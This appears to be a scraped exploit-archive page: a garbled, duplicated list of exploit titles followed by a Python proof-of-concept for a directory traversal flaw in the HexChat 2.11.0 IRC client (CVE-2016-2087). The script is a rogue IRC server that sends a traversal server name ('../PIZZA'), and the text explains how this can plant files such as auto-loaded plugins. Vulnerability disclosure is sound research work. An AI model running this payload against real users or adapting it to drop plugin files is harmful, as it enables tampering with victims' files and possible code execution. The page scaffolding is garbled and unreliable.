
4 new exploits Outlook ATTACH_BY_REF_ONLY File Execution Outlook - ATTACH_BY_REF_ONLY File Execution HB Ecommerce SQL Injection Vulnerability HB Ecommerce - SQL Injection Vulnerability SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability Debian Linux <= 2.1 Print Queue Control Vulnerability Debian Linux <= 2.1 - Print Queue Control Vulnerability FreeBSD 3.3 gdc Buffer Overflow Vulnerability FreeBSD 3.3 gdc - Buffer Overflow Vulnerability Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability NullSoft Winamp 2.10 Playlist Vulnerability NullSoft Winamp 2.10 - Playlist Vulnerability S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2) S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2) Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability IDA Pro 6.3 Crash PoC IDA Pro 6.3 - Crash PoC Confixx 2 Perl Debugger Remote Command Execution Vulnerability Confixx 2 - Perl Debugger Remote Command Execution Vulnerability Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability Novell NetMail 3.x Automatic Script Execution Vulnerability Novell NetMail 3.x - Automatic Script Execution Vulnerability Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability WordPress Freshmail Unauthenticated SQL Injection WordPress Freshmail - Unauthenticated SQL Injection WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass ADH-Web Server IP-Cameras - Multiple Vulnerabilities Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC Hexchat IRC Client 2.11.0 - Directory Traversal Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities
93 lines
3.2 KiB
Python
Executable file
93 lines
3.2 KiB
Python
Executable file
#!/usr/bin/python
|
|
#
|
|
####################
|
|
# Meta information #
|
|
####################
|
|
# Exploit Title: Hexchat IRC client - Server name log directory traversal
|
|
# Date: 2016-01-26
|
|
# Exploit Author: PizzaHatHacker
|
|
# Vendor Homepage: https://hexchat.github.io/index.html
|
|
# Software Link: https://hexchat.github.io/downloads.html
|
|
# Version: 2.11.0
|
|
# Tested on: HexChat 2.11.0 & Linux (64 bits)
|
|
# CVE : CVE-2016-2087
|
|
|
|
#############################
|
|
# Vulnerability description #
|
|
#############################
|
|
'''
|
|
Server Name Directory Traversal in src/common/text.c :
|
|
static char * log_create_pathname (char *servname, char *channame, char *netname)
|
|
|
|
In this function, channame (channel name) and netname (network name as
|
|
configured in the client software) are sanitized to prevent directory
|
|
traversal issues when creating a logfile BUT servname (server-provided
|
|
information) is NOT sanitized before possibly being injected into
|
|
the file path via the 'log_insert_vars' function call.
|
|
|
|
This bug could be triggered in the special (non-default) configuration
|
|
where a user would have :
|
|
* Enabled logging (Settings > Preferences > Chatting > Logging)
|
|
* Used a pattern containing '%s' in the log filepath (instead
|
|
of the default = '%n\%c.log').
|
|
|
|
When connecting to a malicious server, Hexchat IRC client may create or modify
|
|
arbitrary files on the filesystem with the permissions of the IRC client user
|
|
(non-root). For example, the following directories are accessible easily :
|
|
* <Hexchat-Conf>/addons : Executable plugin files that are automatically loaded
|
|
when starting Hexchat IRC client
|
|
* <Hexchat-Conf>/logs : ALL logfiles (from other servers too)
|
|
* <Hexchat-Conf>/scrollback : Scrollback text that is automatically
|
|
loaded when entering a channel/server (this may trigger further bugs)
|
|
* <Hexchat-Conf>/sounds : Sounds that may be played on demand via CTCP
|
|
SOUND messages (this could also trigger further bugs)
|
|
* etc.
|
|
|
|
CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P)
|
|
CVSS Base Score : 4
|
|
Impact Subscore : 4.9
|
|
Exploitability Subscore : 4.9
|
|
'''
|
|
|
|
####################
|
|
# Proof of Concept #
|
|
####################
|
|
'''
|
|
* Install Hexchat IRC Client
|
|
* Settings > Preferences > Chatting > Logging : Enable logging and use the log
|
|
filepath pattern : '%s\%c.log' (without the quotes)
|
|
* Run this Python script on a (server) machine
|
|
* Connect to the server running the script
|
|
* Results : A 'PIZZA' directory will appear in <Hexchat-Conf>/PIZZA instead
|
|
of something like <Hexchat-Conf>/logs/___PIZZA
|
|
'''
|
|
|
|
import socket
|
|
import sys
|
|
import time
|
|
|
|
# Exploit configuration
|
|
HOST = ''
|
|
PORT = 6667
|
|
SERVERNAME = '../PIZZA'
|
|
|
|
# Create server socket
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
try:
|
|
sock.bind((HOST, PORT)) # Bind to port
|
|
sock.listen(0) # Start listening on socket
|
|
|
|
print 'Server listening, waiting for connection...'
|
|
conn, addr = sock.accept()
|
|
|
|
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
|
|
conn.send(':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n')
|
|
|
|
# Wait and close socket
|
|
conn.recv(256)
|
|
sock.close()
|
|
|
|
print 'Done.'
|
|
|
|
except socket.error as msg:
|
|
print 'Failure binding to port : ' + str(msg[0]) + ' ' + msg[1]
|